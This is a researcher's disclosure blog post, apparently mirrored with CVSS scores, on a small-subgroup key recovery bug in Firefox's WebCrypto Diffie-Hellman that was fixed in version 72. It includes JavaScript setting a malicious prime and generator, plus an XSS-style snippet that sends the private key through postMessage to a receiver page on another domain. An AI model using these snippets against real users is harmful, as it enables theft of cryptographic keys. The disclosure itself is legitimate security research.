3.7 Low
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
6 Medium
AI Score
Confidence
High
2.6 Low
CVSS2
Access Vector
NETWORK
Access Complexity
HIGH
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:H/Au:N/C:P/I:N/A:N
0.119 Low
EPSS
Percentile
95.3%
tl;drMozilla Firefox prior to version 72 suffers from Small Subgroups Key Recovery Attack on DH in the WebCrypto’s API. The Firefox’s team fixed the issue r****emoving completely support for DH over finite fields (that is not in the WebCrypto standard). If you find this interesting read further below.
In this blog post I assume you are already knowledgeable about Diffie-Hellman over finite fields and related attacks. If not I recommend to read any cryptography book that covers public key cryptography. Here is a really cool simple explanation by David Wong:
> I found a cooler way to explain Diffie-Hellman :D pic.twitter.com/DlPvGwZbto
>
> — David Wong (@cryptodavidw) January 4, 2020
If you want more details about Small Subgroups Key Recovery Attack on DH I covered some background in one of my previous post (OpenSSL Key Recovery Attack on DH small subgroups (CVE-2016-0701) ). There is also an academic paper where we examine the issue with some more rigors. If you want to read the original attack I recommend the Lim-Lee’s seminal paper.
The Web Cryptography API is a specification that describes a JavaScript API for performing basic cryptographic operations in web applications. This was always a controversial topic between people in the crypto arena and you can read some eminent opinion in the wild e.g. :
all beautifully summarized in Krzysztof Kotowicz’s blog post: JS crypto goto fail?
Said that this post is not about the usefulness of WebCrypto so I’ll spare you my opinion on the topic :p
Ok you might say, now we have three paragraphs about WebCrypto but how is this looking like? Luckily the good diafygi comes to the rescue with a full page of examples
WebCrypto API Live table
So how can I encrypt a message using WebCrypto API? Here is an example from that page:
WebCrypto Firefox Telemetry
The graph above is taken directly from Firefox’s telemetry but what are those weird numbers? Well in order to make some sense out of it you need to look at the source code!!! :
So for some weird reason _AES CBC_is the most used method in Firefox nightly 72 followed by the two SHA methods.
There are many places in the web where WebCrypto security is discussed in depth. Some pointers are Harry Halpin slides delivered at Security Standardization Research Conference or Tim Taubert talk at JS Conf. Said that, this is the way a Juraj Somorovsky (a colleague of mine at Ruhr-Universität Bochum) described it and I found the parallelism great:
So what does it mean? Well basically when a cryptographic key is created/imported, there is an extractable property that if set to**false **will not allow (as the property name hints) the extraction of raw key material (aka the value of the key). So even if an attacker will be able to gain XSS privilege he will not be able to steal the key!!. See the example below :
In this example an exception is caught and logged at line 29:
DOMException: “A parameter or an operation is not supported by the underlying object”
The reason is because the key is declared as not extractable at line 7.
So we arrived to talk about WebCrypto DH. Let’s go directly to the point. Diffie-Hellman over finite fields(DH from now on) is not in the WebCrypto specification and is (until today) implemented only by Mozilla Firefox (for the record from Elliptic Curve Diffie-Hellman -ECDH is instead** part of the specification**). This was argument of a little debate during the specification development but at the end Ryan Sleevi made the point (BTW Google Chrome never implemented it)
For some reason Mozilla Firefox decided to keep the implementation of WebCrypto DH. Now a typical potential**_ WebCrypto DH_** scenario usage is the following:
Pfiuuu so let’s talk about the bug. One of the biggest criticism that people makes about DH is that the choice of parameters is error prone. Indeed differently from ECDHwhere the set of curves to use is limited (P-256 and Curve25519 are probably covering almost 100% of the use cases) for the finite field case it is possible to use any prime number that is sufficiently large (also for this case exist some specification that suggest some specific numbers, see also my previous post). In order to avoid most of the attacks a prime number used for DH needs to cover two important requirements:
const MALICIOUS_PRIME = new Uint8Array([129,0,0,0,0,0,0,0,0,0,0,0,0,0,0,17]);
// this generator has order 5
const MALICIOUS_GENERATOR = new Uint8Array([46,35,147,92,93,21,176,170,70,144,93,164,112,85,178,126]);** **
**privateKey.algorithm.prime = MALICIOUS_PRIME;
privateKey.algorithm.generator = MALICIOUS_GENERATOR; **
Let me explain, what the attacker achieved here was to:
You can find a simple demo at <https://asanso.github.io/firefox/victim.html> . It simply does an alert() with the extracted private key modulo 5. As said I was a lazy to implement the full attack (sorry :( ) but I hope you got the point. As a bonus point though I added some little snippet on how an attacker could exfiltrate the key using postMessage: ** //XSS starts here
//exfiltrate the privateKey through postMessage
//the attacker receiver domanin can of course be different**
var ifr = document.createElement(“iframe”)
ifr.src = “https://asanso.github.io/firefox/receiver.html”
ifr.id = “frm”;
document.body.appendChild(ifr);
var frm = document.getElementById(‘frm’).contentWindow;
frm.postMessage(kpE.privateKey,“https://asanso.github.io/firefox/receiver.html”);
As a fix Firefox Security team decide to remove support for DH from WebCrypto API entirely (you can find the site compatibility note here), but not before adding telemetry for DH use in WebCrypto API. As a result starting with Firefox version 72 DH WebCrypto is not anymore shipped/supported.
**27-06-2018 -**Reported the issue via bugzilla: Bug 1471684
28-06-2018- Firefox security team confirmed the vulnerability (setting impact toModerate) 28-03-2019 -Bug 1539578: Add telemetry for DH use in WebCrypto API was created 28-10-2019 -Bug 1564509: Remove support for DH from WebCrypto API (not in spec) was created **07-01-2020 - **Firefox 72 containing the fix was released ****
I would like to thank Franziskus Kiefer and all the Firefox Security team, as usual you rock!
3.7 Low
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
6 Medium
AI Score
Confidence
High
2.6 Low
CVSS2
Access Vector
NETWORK
Access Complexity
HIGH
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:H/Au:N/C:P/I:N/A:N
0.119 Low
EPSS
Percentile
95.3%